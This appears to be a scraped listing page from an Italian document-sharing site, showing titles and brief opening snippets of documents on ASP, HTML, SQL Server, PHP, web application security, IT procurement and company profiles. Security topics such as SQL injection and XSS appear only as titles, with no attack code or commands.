GESTIONE DI MDB in WEB GESTIONE DI MDB in WEB Il presente documento riporta un esempio generico di gestione di un database di Access. Il lettore può personalizzare in base alle proprie esigenze sia il contenuto del database,

Dettagli

A. Lorenzi Pagine ASP

A. Lorenzi Pagine ASP Pagine ASP Web server software per la gestione di un computer host Internet oppure di un server di rete, che mette a disposizione dati o applicativi per gli utenti della rete Web server IIS (Internet Information

Dettagli

D B M G Il linguaggio HTML

D B M G Il linguaggio HTML Programmazione Web Il linguaggio HTML Il linguaggio HTML Concetti di base Le interfacce utente in HTML I form Le tabelle Il passaggio dei parametri contenuti nei form @2011 Politecnico di Torino 1 Concetti

Dettagli

INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8

INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8 Introduzione e scopo del documento INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO SICUREZZA... 8 1.1 INTRODUZIONE... 9 1.1.1 MOTIVAZIONI: PERCHÉ SERVE LA SICUREZZA... 9 1.1.2 CONFIDENZIALITÀ,

Dettagli

Inviato: 20 Gen :11 pm Oggetto: Appunti - Corso avanzato. Inviato: 20 Gen :11 pm Oggetto: 20/01/ Avanzato

Inviato: 20 Gen :11 pm Oggetto: Appunti - Corso avanzato. Inviato: 20 Gen :11 pm Oggetto: 20/01/ Avanzato lnx.brescianet.com Sito didattico - Prof. Sechi Marco FAQ Cerca Lista degli utenti Gruppi utenti Profilo Non ci sono nuovi messaggi Logout [ ] Appunti - Corso avanzato Indice del forum -> Avanzato Precedente

Dettagli

SQL Server Introduzione all uso di SQL Server Dutto Riccardo. Dutto Riccardo - SQL Server 2008.

SQL Server Introduzione all uso di SQL Server Dutto Riccardo.  Dutto Riccardo - SQL Server 2008. SQL Server 2008 Introduzione all uso di SQL Server 2008 Dutto Riccardo http://dbdmg.polito.it SQL Server 2008 SQL Server Management Studio Gestione dei server OLAP e OLTP Gestione Utenti Creazione e gestione

Dettagli

@2011 Politecnico di Torino 1

@2011 Politecnico di Torino 1 Concetti di base Programmazione Web Il linguaggio HTML HTML consente di annotare un testo per contrassegnare le parti che lo compongono Le annotazioni sono realizzate tramite i "tag" Visualizzare documenti

Dettagli

SQL Server 2008. Architettura Client-Server. SQL Server 2008. Introduzione all uso di SQL Server 2008. Dutto Riccardo. http://dbdmg.polito.

SQL Server 2008. Architettura Client-Server. SQL Server 2008. Introduzione all uso di SQL Server 2008. Dutto Riccardo. http://dbdmg.polito. SQL Server 2008 Introduzione all uso di SQL Server 2008 Dutto Riccardo http://dbdmg.polito.it SQL Server 2008 Gestione dei server OLAP e OLTP Gestione Utenti Creazione e gestione DB SQL Server Business

Dettagli

Trucchi, consigli e suggerimenti per il tuo portale in ASP

Trucchi, consigli e suggerimenti per il tuo portale in ASP Trucchi, consigli e suggerimenti per il tuo portale in ASP di Salvatore Aranzulla Prima edizione Luglio 2004 Pagina 1 di 162 Sai che è possibile creare un sito con guestbook, news, sondaggi e tutto quello

Dettagli

Presidenza del Consiglio dei Ministri Autorità Nazionale per la Sicurezza CESIS III Reparto U.C.Si.

Presidenza del Consiglio dei Ministri Autorità Nazionale per la Sicurezza CESIS III Reparto U.C.Si. Presidenza del Consiglio dei Ministri Autorità Nazionale per la Sicurezza CESIS III Reparto U.C.Si. Schema Nazionale di Certificazione per prodotti classificati Workshop on Network and Information Security.

Dettagli

Sicurezza Informatica: Tecniche di SQL INJECTION

Sicurezza Informatica: Tecniche di SQL INJECTION Sicurezza Informatica: Tecniche di SQL INJECTION Pietro Bongli Aprile 2004 N.B. L'informazione contenuta in queste pagine è divulgata per scopi puramente didattici e non per ni illegali. Structured Query

Dettagli

APPENDICE 4 AL CAPITOLATO TECNICO

APPENDICE 4 AL CAPITOLATO TECNICO APPENDICE 4 AL CAPITOLATO TECNICO Descrizione dei profili professionali INDICE 1 PROFILI PROFESSIONALI RICHIESTI 3 1.1 CAPO PROGETTO 3 1.2 ANALISTA FUNZIONALE 4 1.3 ANALISTA PROGRAMMATORE 5 1.4 PROGRAMMATORE

Dettagli

Servizio L2.S3.9 - Servizi professionali

Servizio L2.S3.9 - Servizi professionali Servizio L2.S3.9 - Servizi professionali Il servizio ha come obiettivo quello di supportare le Amministrazioni nella realizzazione di attività nell ambito della sicurezza applicativa, comprensive di quelle

Dettagli

REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA

REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA SETTORE ECONOMICO PROFESSIONALE 1 Servizi di informatica Processo Sviluppo e gestione di prodotti e servizi informatici Sequenza di

Dettagli

InfoSec: non solo firewall e antivirus. Massimo Grandesso

InfoSec: non solo firewall e antivirus. Massimo Grandesso InfoSec: non solo firewall e antivirus Massimo Grandesso massimo.grandesso@gmail.com Don't Try This at Home! Le principali cause di incidente (dati globali) 2015 State of the Endpoint Report Le principali

Dettagli

Università di Ferrara Corso di Laurea Magistrale in Ingegneria Informatica e dell'automazione Ing. Massimo Carnevali Anno Accademico

Università di Ferrara Corso di Laurea Magistrale in Ingegneria Informatica e dell'automazione Ing. Massimo Carnevali Anno Accademico Sicurezza dei sistemi informatici in internet "Master lock with root password" di Scott Schiller - Flickr: Master lock, "r00t" password. Con licenza CC BY 2.0 tramite Wikimedia Commons Università di Ferrara

Dettagli

Architetture Client/Server. Un architettura è centralizzata quando i dati e le applicazioni (programmi) risiedono in un unico nodo elaborativo

Architetture Client/Server. Un architettura è centralizzata quando i dati e le applicazioni (programmi) risiedono in un unico nodo elaborativo Basi di Dati Architetture Client/Server D B M G Architettura centralizzata Un architettura è centralizzata quando i dati e le applicazioni (programmi) risiedono in un unico nodo elaborativo Tutta l intelligenza

Dettagli

Offerta tecnica. Allegato II Piano di progetto - Gantt

Offerta tecnica. Allegato II Piano di progetto - Gantt Offerta tecnica Allegato II Piano di progetto - Gantt Gestione, sviluppo e manutenzione dell architettura software di Business Intelligence in uso presso Cestec S.p.A. Redatto da Omnia Service Italia s.r.l.

Dettagli

The first all-in-one Cloud Security Suite Platform

The first all-in-one Cloud Security Suite Platform The first all-in-one Cloud Security Suite Platform SWASCAN ALL in ONE SWASCAN Web Application SWASCAN Network SWASCAN Code Review SWASCAN All-in-one The first Cloud Suite Security Platform La prima suite

Dettagli

VBScript. VBScript. Visual Basic Scripting Edition. Linguaggio di script per browser e server Microsoft Deriva da Visual Basic, ma è interpretato

VBScript. VBScript. Visual Basic Scripting Edition. Linguaggio di script per browser e server Microsoft Deriva da Visual Basic, ma è interpretato VBScript Visual Basic Scripting Edition 1 VBScript Linguaggio di script per browser e server Microsoft Deriva da Visual Basic, ma è interpretato 2 Pag. 1 Principali caratteristiche Fine istruzione singola

Dettagli

SECONDA PARTE.omissis. . omissis

SECONDA PARTE.omissis. . omissis SECONDA PARTE.omissis. 2. In relazione al tema proposto nella prima parte, si immagini di volere gestire sul server Web un sistema di semplici NEWS interne alla scuola, caratterizzate da un autore, un

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Titolo Modulo Contenuti inc. Ore DATE Vecchie Date NUOVE TUTOR. Mario Varini un istituto scolastico.

Titolo Modulo Contenuti inc. Ore DATE Vecchie Date NUOVE TUTOR. Mario Varini un istituto scolastico. Aggiornamento Calendario FortTic C ITIS Dalle 15.00 alle 18.00 mod. Titolo Modulo Contenuti inc. Ore DATE Vecchie Date NUOVE TUTOR Identificazione dei bisogni, 1 Valutazione del Software e Infrastrutture

Dettagli

Mantenimento dello stato

Mantenimento dello stato Mantenimento dello stato Laboratorio Progettazione Web AA 2009/2010 Chiara Renso ISTI- CNR - c.renso@isti.cnr.it Abbiamo visto come il passaggio di informazioni (parametri) tra le pagine possa avvenire

Dettagli

Sistema Informativo Unitario Regionale per la Programmazione (S.I.U.R.P.) LA SICUREZZA INFORMATICA

Sistema Informativo Unitario Regionale per la Programmazione (S.I.U.R.P.) LA SICUREZZA INFORMATICA Sistema Informativo Unitario Regionale per la Programmazione (S.I.U.R.P.) LA SICUREZZA INFORMATICA Argomenti Introduzione Mettere in Sicurezza il proprio Computer Virus & minacce: come difendersi Utilizzo

Dettagli

La nostra storia inizia nel 1992, anno in cui Nova Systems Roma viene costituita e muove i primi passi nel mercato dei servizi informatici.

La nostra storia inizia nel 1992, anno in cui Nova Systems Roma viene costituita e muove i primi passi nel mercato dei servizi informatici. COMPANY PROFILE La nostra storia inizia nel 1992, anno in cui Nova Systems Roma viene costituita e muove i primi passi nel mercato dei servizi informatici. In risposta alla veloce evoluzione delle tecnologie

Dettagli

Risorsa N 038000. Dal 09/2010 al 08/2011: Corso Cisco CCNA Networking Associate Dal 07/2014 al 08/2014: Corso Cisco CCNA Security Networking Associate

Risorsa N 038000. Dal 09/2010 al 08/2011: Corso Cisco CCNA Networking Associate Dal 07/2014 al 08/2014: Corso Cisco CCNA Security Networking Associate DATI ANAGRAFICI: Nato nel : 1988 Nato e Residente a : Roma Risorsa N 038000 FORMAZIONE E CORSI: Dal 09/2010 al 08/2011: Corso Cisco CCNA Networking Associate Dal 07/2014 al 08/2014: Corso Cisco CCNA Security

Dettagli

Introduzione a PHP Gestione dei Dati e della Conoscenza

Introduzione a PHP Gestione dei Dati e della Conoscenza Introduzione a PHP Gestione dei Dati e della Conoscenza Diego De Cao, Roberto Basili {decao,basili}@info.uniroma2.it a.a. 2008/2009 PHP Overview PHP (acronimo ricorsivo per "PHP: Hypertext Preprocessor")

Dettagli

CLASSIFICAZIONE CONSIP PUBLIC APPENDICE 2 AL CAPITOLATO TECNICO LOTTO 2. Descrizione dei profili professionali

CLASSIFICAZIONE CONSIP PUBLIC APPENDICE 2 AL CAPITOLATO TECNICO LOTTO 2. Descrizione dei profili professionali CLASSIFICAZIONE CONSIP PUBLIC APPENDICE 2 AL CAPITOLATO TECNICO LOTTO 2 Descrizione dei profili professionali pag. 1 di 11 SOMMARIO 1 INTRODUZIONE 3 2 DESCRIZIONE DEI PROFILI PROFESSIONALI 4 2.1 CAPO PROGETTO

Dettagli

Creare un portale personalizzato

Creare un portale personalizzato 1 Creare un portale personalizzato Passi da seguire 1) Aprire la pagina: http://www.term-minator.it/modello.html 2) Scaricare modello : 2) Aprire il file modello con blocco note : 1 2 3) Modificare il

Dettagli

Un Web Browser (client) Un Web Server (server) Un Database

Un Web Browser (client) Un Web Server (server) Un Database Interfacciamento di database su web con ASP ed ADO Introduzione Una applicazione web utilizza un sito web come front end per una tradizionale applicazione. La distinzione tra sito ed applicazione web risiede

Dettagli

Web applications con. breve introduzione. 23/10/12 Davide Zedda ITC Levi

Web applications con. breve introduzione. 23/10/12 Davide Zedda ITC Levi Web applications con breve introduzione Cosa ci serve conoscere Client -server Html Http Architettura Client-Server In questa architettura c'è uno scambio di risorse tra due dispositivi: il client e il

Dettagli

Sistemi Operativi 11 ottobre 2017

Sistemi Operativi 11 ottobre 2017 Sistemi Operativi 11 ottobre 2017 This book is the result of a collaborative effort of a community of people like you, who believe that knowledge only grows if shared. We are waiting for you! Get in touch

Dettagli

Simulazione seconda prova Esame di Stato Sito Web - Gestione di un centro agroalimentare all ingrosso (Parte seconda)

Simulazione seconda prova Esame di Stato Sito Web - Gestione di un centro agroalimentare all ingrosso (Parte seconda) Simulazione seconda prova Esame di Stato Sito Web - Gestione di un centro agroalimentare all ingrosso (Parte seconda) Il candidato realizzi inoltre il sito Internet del centro che deve permettere, tra

Dettagli

LE PRIME ACTIVE SERVICE PAGE: oggetto REQUEST

LE PRIME ACTIVE SERVICE PAGE: oggetto REQUEST LE PRIME ACTIVE SERVICE PAGE: oggetto REQUEST L'oggetto Request può essere considerato come l'esatto contrario dell'oggetto Response, infatti mentre quest'ultimo invia dati al browser, Request serve a

Dettagli

Crea il tuo sito in ASP!

Crea il tuo sito in ASP! Crea il tuo sito in ASP! di Salvatore Aranzulla Prima edizione Luglio 2004 Pagina 1 di 161 Sai che è possibile creare un sito con guestbook, news, sondaggi e tutto quello che puoi immaginare con le ASP

Dettagli

Lezione II: Web server e ambiente di lavoro

Lezione II: Web server e ambiente di lavoro Lezione II: Web server e ambiente di lavoro In questa lezione, in laboratorio, si mostrerà quali sono i passi necessari per creare ed eseguire una pagina ASP. Brevemente, verrà fatto anche vedere, come

Dettagli

CONSAPEVOLEZZA IN MATERIA DI SICUREZZA INFORMATICA: IN CHE MODO IL COMPORTAMENTO ONLINE PUÒ RIVELARSI RISCHIOSO PER GLI UTENTI

CONSAPEVOLEZZA IN MATERIA DI SICUREZZA INFORMATICA: IN CHE MODO IL COMPORTAMENTO ONLINE PUÒ RIVELARSI RISCHIOSO PER GLI UTENTI CONSAPEVOLEZZA IN MATERIA DI SICUREZZA INFORMATICA: IN CHE MODO IL COMPORTAMENTO ONLINE PUÒ RIVELARSI RISCHIOSO PER GLI UTENTI Ottobre 2013 REPORT SULLE FRODI Negli Stati Uniti, ottobre dà inizio al mese

Dettagli

Linee di programmazione

Linee di programmazione Ministero dell Istruzione, dell Università e della Ricerca Ufficio Scolastico regionale per il Lazio Istituto Tecnico Industriale A. Pacinotti ISTITUTO TECNICO TECNOLOGICO - LICEO SCIENTIFICO DELLE SCIENZE

Dettagli

Analisi dei rischi: esercizi (esercizio 2)

Analisi dei rischi: esercizi (esercizio 2) Analisi dei rischi: esercizi (esercizio 2) Marco Domenico Aime < m.aime @ polito.it > Marco Vallini < marco.vallini @ polito.it > Politecnico di Torino Dip. di Automatica e Informatica 1 Strumenti software

Dettagli

Symantec IT Management Suite 8.0 powered by Altiris technology

Symantec IT Management Suite 8.0 powered by Altiris technology Symantec IT Management Suite 8.0 powered by Altiris technology Requisiti indispensabili per l'installazione di IT Management Suite Prima di avviare l'installazione, assicurarsi che il computer sul quale

Dettagli

GRUPPO DOMANDE N. 1. Quesito n. 1 Descrivere sinteticamente le finalità e le modalità d uso dei seguenti comandi UNIX / LINUX: LS, KILL, PS.

GRUPPO DOMANDE N. 1. Quesito n. 1 Descrivere sinteticamente le finalità e le modalità d uso dei seguenti comandi UNIX / LINUX: LS, KILL, PS. GRUPPO DOMANDE N. 1 Quesito n. 1 Descrivere sinteticamente le finalità e le modalità d uso dei seguenti comandi UNIX / LINUX: LS, KILL, PS. Quesito n. 2 Descrivere sinteticamente le finalità d impiego

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Modulo o Form in Html

Modulo o Form in Html Pagina dinamica E un documento contenente oggetti, dati e informazioni che possono variare anche in base all iterazione dell utente con il documento stesso. Un esempio classico è quello di una persona

Dettagli

Introduzione. Sommario. Il software. Definizione di Ingegneria del software

Introduzione. Sommario. Il software. Definizione di Ingegneria del software Sommario Introduzione Leggere Cap. 1 Ghezzi et al. Definizione Nascita dell ingegneria del software Ruolo Relazione con altre discipline Introduzione 2 Il software Il software e` definito come: i programmi,

Dettagli

3.3.6 Gli operatori Le funzioni di accesso al tipo Le strutture di controllo Le funzioni

3.3.6 Gli operatori Le funzioni di accesso al tipo Le strutture di controllo Le funzioni IIndice Capitolo 1 Da dove partiamo: pagine web statiche 1 1.1 Principi di base.............................. 1 1.1.1 Il paradigma client-server.................... 1 1.1.2 Ipertesto, multimedia, ipermedia................

Dettagli

TESI DI LAUREA IN INFORMATICA

TESI DI LAUREA IN INFORMATICA UNIVERSITA DEGLI STUDI DI NAPOLI FEDERICO II TESI DI LAUREA IN INFORMATICA UNA WEB APPLICATION SU INFRASTRUTTURA PER IL PROGETTO DAME Tutor Accademico: Dott.ssa Anna Corazza Tutor Aziendale: Dott. Massimo

Dettagli

IENA Un modello alternativo per la rivelazione delle intrusioni in una rete locale.

IENA Un modello alternativo per la rivelazione delle intrusioni in una rete locale. IENA Un modello alternativo per la rivelazione delle intrusioni in una rete locale. Marco Ramilli 1 OutLine. L odierna crescita di servizi distribuiti ha generato una vera e propria problematica nel settore

Dettagli

ALLEGATO AL CAPITOLATO TECNICO

ALLEGATO AL CAPITOLATO TECNICO ALLEGATO AL CAPITOLATO TECNICO Appalto per l affidamento dei servizi di sviluppo, manutenzione e supporto del software applicativo Sistema informatico di prevenzione del furto di identità (SCIPAFI) Requisiti

Dettagli

1 test per la certificazione Microsoft i

1 test per la certificazione Microsoft i Introduzione Capitolo 1 xxiii 1 test per la certificazione Microsoft i Condizioni di svolgimento dei test 2 Impostazione e caratteristiche dei test 4 Riconoscere il proprio tipo di esame 7 Strategia per

Dettagli

HTML: FORM. Prof. Francesco Accarino IIS Altiero Spinelli Via Leopardi 132 Sesto San Giovanni

HTML: FORM. Prof. Francesco Accarino IIS Altiero Spinelli Via Leopardi 132 Sesto San Giovanni HTML: FORM Prof. Francesco Accarino IIS Altiero Spinelli Via Leopardi 132 Sesto San Giovanni Form Text Radio Select CheckBox TextArea Button ... L'elemento serve per delimitare un modulo

Dettagli

Tito Flagella - Il protocollo HTTP

Tito Flagella - Il protocollo HTTP Tito Flagella - tito@link.it Il protocollo HTTP Il protocollo HTTP È il protocollo standard tramite il quale i server Web rispondono alle richieste dei client (inizialmente i browser); È basato su un modello

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

L evoluzione delle Applicazioni Distribuite

L evoluzione delle Applicazioni Distribuite L evoluzione delle Applicazioni Distribuite Dai terminali a fosfori verdi al Client-Server a Internet Architettura basata su Mainframe thin client su 3270 a fosfori verde server TP-Monitor su Mainframe

Dettagli

Piano di Collaudo RU Servizio VPN Internet

Piano di Collaudo RU Servizio VPN Internet Ministero delle Infrastrutture e dei Trasporti DIPARTIMENTO PER I TRASPORTI, LA NAVIGAZIONE, GLI AFFARI GENERALI ED IL PERSONALE Direzione Generale per la Motorizzazione Divisione 7 Centro Elaborazione

Dettagli

KLEIS A.I. SECURITY SUITE

KLEIS A.I. SECURITY SUITE KLEIS A.I. SECURITY SUITE Protezione dei servizi non web Kleis A.I. SecureMail, Kleis A.I. SecureEmulation, Kleis A.I. SecureXEmulation, Kleis A.I. SecureTransfer, Kleis A.I. SecureShare www.kwaf.it Protezione

Dettagli

ASP Corso introduttivo

ASP Corso introduttivo ASP Corso introduttivo Autore: Filippo Naggi Indice Cos è ASP Cosa serve per iniziare Configurazione di IIS Prima pagina in ASP Delimitatori Variabili Strutture di controllo Collegamento al database Database:

Dettagli

Solution Integrator 18/06/16. www.middlewaresrl.com

Solution Integrator 18/06/16. www.middlewaresrl.com 18/06/16 www.middlewaresrl.com CHI SIAMO Azienda giovane e dinamica guidata da un team di esperti specialisti Start-up innovativa nell information technology Professionisti dell ict: progettiamo, sviluppiamo

Dettagli

Linguaggi di Programmazione

Linguaggi di Programmazione Linguaggi di Programmazione Linguaggi di Programmazione Programmazione. Insieme delle attività e tecniche svolte per creare un programma (codice sorgente) da far eseguire ad un computer. Che lingua comprende

Dettagli

vulnerabilità del software

vulnerabilità del software vulnerabilità del software 1 quando il software non si comporta correttamente. input precondizioni elaborazione postcondizioni output un programma è corretto quando su qualsiasi input che soddisfa le precondizioni

Dettagli

Pagine Asp. Pagine Asp

Pagine Asp. Pagine Asp Pagine Asp Architettura web Esistono alcune limitazioni alle applicazioni che si possono realizzare in HTML, ad esempio non è possibile costruire un sito web che consenta all utente di accedere ai dati

Dettagli

tbl_feedback Id Autonumber primary key E poi ho inserito un paio di records in modo da fare un test dell'intera procedura.

tbl_feedback Id Autonumber primary key E poi ho inserito un paio di records in modo da fare un test dell'intera procedura. Database access with ADO Se il nostro sito diventa popolare dovremmo ricevere un mucchio di email e presto ci accorgeremo che programmi come Outlook o Eudora non sono adeguati a conservare questo dati.

Dettagli

Sommario. 1 La shell di Windows PowerShell... 1

Sommario. 1 La shell di Windows PowerShell... 1 Ringraziamenti.........................................................xix Introduzione........................................................... xxi A chi è rivolto il libro...............................................

Dettagli

1) Il client(browser utilizzato) invia al server i dati inseriti dall utente. Server

1) Il client(browser utilizzato) invia al server i dati inseriti dall utente. Server 2) Il Server richiama l'interprete PHP il quale esegue i comandi contenuti nel file.php specificato nell'attributo action del tag form creando un file HTML sulla base dei dati inviati dall utente 1) Il

Dettagli

Registro elettronico scuola ospedaliera rel. 5.0

Registro elettronico scuola ospedaliera rel. 5.0 Registro elettronico scuola ospedaliera rel. 5.0 MODELLO DI AUTENTICAZIONE E AUTORIZZAZIONE 1/7 INDICE MODELLO DI AUTENTICAZIONE E AUTORIZZAZIONE...3 INTRODUZIONE...3 DESCRIZIONE GENERALE DEL MODELLO DI

Dettagli

CALENDARIO CORSI. Settembre Febbraio Kosmous Srl Via Padova, Roma Tel: Fax:

CALENDARIO CORSI. Settembre Febbraio Kosmous Srl Via Padova, Roma Tel: Fax: CALENDARIO CORSI Settembre 2017 - Febbraio 2018 Kosmous Srl Via Padova, 4-00161 - Roma Tel: 0641735400 - Fax: 0641796080 - www.kosmous.com Applicativi Set Ott Nov Dic Gen Feb Adobe Director - - - - - -

Dettagli

Interazione con DBMS remoto. DBMS MS SQL Server: web-hosting Somee

Interazione con DBMS remoto. DBMS MS SQL Server: web-hosting Somee Interazione con DBMS remoto Scopo: in archittettura C/S, si desideri prevedere la possibilità di consultare, in base alle proprie esigenze, i contenuti di data-base multimediali in Internet. Quindi utilizzare

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

2011 Politecnico di Torino 1

2011 Politecnico di Torino 1 SQL per le applicazioni Esercitazione PHP e MySQL Svolgimento D B M G Passi di risoluzione creazione e popolamento della base di dati Creazione di un script SQL Passo 2 creazione di una query d interrogazione

Dettagli

Ricevimento: dopo la lezione (in aula) o su appuntamento (Sede Scientifica Pal. 1 Primo Piano)

Ricevimento: dopo la lezione (in aula) o su appuntamento (Sede Scientifica Pal. 1 Primo Piano) Come contattarmi Ricevimento: dopo la lezione (in aula) o su appuntamento (Sede Scientifica Pal. 1 Primo Piano) Telefono : 0521 / 90 5731 Email : stefano.cagnoni@unipr.it Sito del corso : http://www.ce.unipr.it/people/cagnoni/didattica/basidati

Dettagli

Solution Integrator 28/12/16.

Solution Integrator 28/12/16. 28/12/16 www.middlewaresrl.com CHI SIAMO Azienda giovane e dinamica guidata da un team di esperti specialisti Start-up innovativa nell information technology Professionisti dell ict: progettiamo, sviluppiamo

Dettagli

Security policy e Risk Management: la tecnologia BindView

Security policy e Risk Management: la tecnologia BindView NETWORK SECURITY COMPANY Security policy e Risk Management: la tecnologia BindView www.bindview.com Luca Ronchini lr@symbolic.it Security policy e Risk Management : vulnerabilty management e security assessment,

Dettagli

Servlet e JDBC. Servlet e Web Server. Servlet e Web Server. Servlet e Web Server. Richieste. Servlet. Servlet:

Servlet e JDBC. Servlet e Web Server. Servlet e Web Server. Servlet e Web Server. Richieste. Servlet. Servlet: e JDBC Programmazione in Rete e Laboratorio Matteo Baldoni Dipartimento di Informatica Universita` degli Studi di Torino C.so Svizzera, 185 I-10149 Torino e : estensioni del Java API permettono di scrivere

Dettagli

DBMS. Alice Pavarani

DBMS. Alice Pavarani DBMS Alice Pavarani DBMS Insieme di programmi che offrono gli strumenti per gestire una base di dati Permette di: definire la struttura delle tabelle recuperare le informazioni manipolare i dati memorizzati

Dettagli

SERVIZIO DI ACCESSO ALLA RETE CSI-RUPAR TRAMITE VPN SSL

SERVIZIO DI ACCESSO ALLA RETE CSI-RUPAR TRAMITE VPN SSL SERVIZIO DI ACCESSO ALLA RETE CSI-RUPAR TRAMITE ALLEGATO E Premessa Il presente documento descrive le principali caratteristiche del servizio di accesso alla rete CSI. Descrizione del Servizio Il servizio

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Luca Tesei. Laboratorio di Sviluppo Web: Le Basi. Modulo IFTS. Fermo 31/03, 03/04, 07/ Prof. Luca Tesei Università di Camerino 1

Luca Tesei. Laboratorio di Sviluppo Web: Le Basi. Modulo IFTS. Fermo 31/03, 03/04, 07/ Prof. Luca Tesei Università di Camerino 1 Luca Tesei Laboratorio di Sviluppo Web: Le Basi Modulo IFTS Fermo 31/03, 03/04, 07/04 2017 Prof. Luca Tesei Università di Camerino 1 Informazioni di Contatto Email docente: luca.tesei@unicam.it Telefono:

Dettagli

OBIETTIVI MINIMI Anno scolastico TIC-TIT. 1. Foglio elettronico: funzioni fondamentali (Excel)

OBIETTIVI MINIMI Anno scolastico TIC-TIT. 1. Foglio elettronico: funzioni fondamentali (Excel) ISTITUTO TECNICO COMMERCIALE STATALE SCHIAPARELLI-GRAMSCI CLASSI CORSI OBIETTIVI MINIMI Anno scolastico 2010-2011 TIC-TIT OBIETTIVI 1. Foglio elettronico: funzioni fondamentali (Excel) CONTENUTI / tipologia

Dettagli

SCHEDA PROGETTO AGRITURISMO SECONDA FASE

SCHEDA PROGETTO AGRITURISMO SECONDA FASE ALLEGATO 1 SCHEDA PROGETTO AGRITURISMO SECONDA FASE Premessa Il progetto attuazione di un portale regionale per la promozione e divulgazione degli agriturismi Calabresi, era stato avviato con una convenzione

Dettagli

Servizio Calcolo e Reti

Servizio Calcolo e Reti Servizio Calcolo e Reti F. Semeria Assemblea di Sezione 19 Luglio 2017 Assemblea di Sezione 2017 1/14 Misure minime di sicurezza ICT per le pubbliche amministrazioni Circolare AgID (Agenzia per l Italia

Dettagli

Programma didattico. Sviluppare Applicazioni Distribuite in ambiente. Spring MVC

Programma didattico. Sviluppare Applicazioni Distribuite in ambiente. Spring MVC Programma didattico Sviluppare Applicazioni Distribuite in ambiente Spring MVC Programma del corso 1.Progettazione e Sviluppo Database Relazionali Questa competenza permette di Progettare e Sviluppare

Dettagli

Business Continuity Experts

Business Continuity Experts Business Continuity Experts Contenuti ORBIT MOBILE..Pag.3 ORBIT: l obiettivo del Business Continuity Management...Pag.5 ORBIT MOBILE ORBIT Mobile è un modulo di ORBIT per la gestione di alcune funzionalità

Dettagli

PIATTAFORMA RISK MANAGEMENT I Risk

PIATTAFORMA RISK MANAGEMENT I Risk PIATTAFORMA RISK MANAGEMENT I Risk Metodologia di analisi Specializzazione Modellizzazione Valutazione del rischio Gestione del rischio Terminologia e ruoli Architettura tecnologica Screenshoot del prodotto

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

La Sicurezza nel Cloud Computing. Simone Riccetti IBM IT Security Architect

La Sicurezza nel Cloud Computing. Simone Riccetti IBM IT Security Architect La Sicurezza nel Cloud Computing Simone Riccetti IBM IT Security Architect Agenda Sicurezza e Cloud Computing Soluzioni di sicurezza per il Cloud Soluzioni di sicurezza nel Cloud IBM Security Services

Dettagli

COMPANY PROFILE 2016

COMPANY PROFILE 2016 COMPANY PROFILE 2016 La storia La 3A Informatica nasce per iniziativa di un gruppo di professionisti impegnati nel settore dell informatica da oltre 20 anni. Questa esperienza unita ad una profonda conoscenza

Dettagli

LEGGERE E VISUALIZZARE I DATI DI UNA TABELLA IN UNA PAGINA WEB

LEGGERE E VISUALIZZARE I DATI DI UNA TABELLA IN UNA PAGINA WEB ADO ACTIVE SERVICE PAGES E DATABASE: tecnologia LEGGERE E VISUALIZZARE I DATI DI UNA TABELLA IN UNA PAGINA WEB Per visualizzare i dati di una tabella in una pagina web, dobbiamo utilizzare l'oggetto ADODB.Recordset

Dettagli

Sessione ordinaria 2003 Seconda prova scritta ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Indirizzo: INFORMATICA CORSO SPERIMENTALE Progetto ABACUS

Sessione ordinaria 2003 Seconda prova scritta ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Indirizzo: INFORMATICA CORSO SPERIMENTALE Progetto ABACUS Sessione ordinaria 2003 Seconda prova scritta ESAME DI STATO DI ISTITUTO TECICO IDUSTRIALE Indirizzo: IFORMATICA CORSO SPERIMETALE Progetto ABACUS Vivaio Si tratta di un classico problema di gestione di

Dettagli

La nostra esperienza come System Integrator ci permette di seguire i clienti su uno spettro variegato di problematiche di supporto e integrazione:

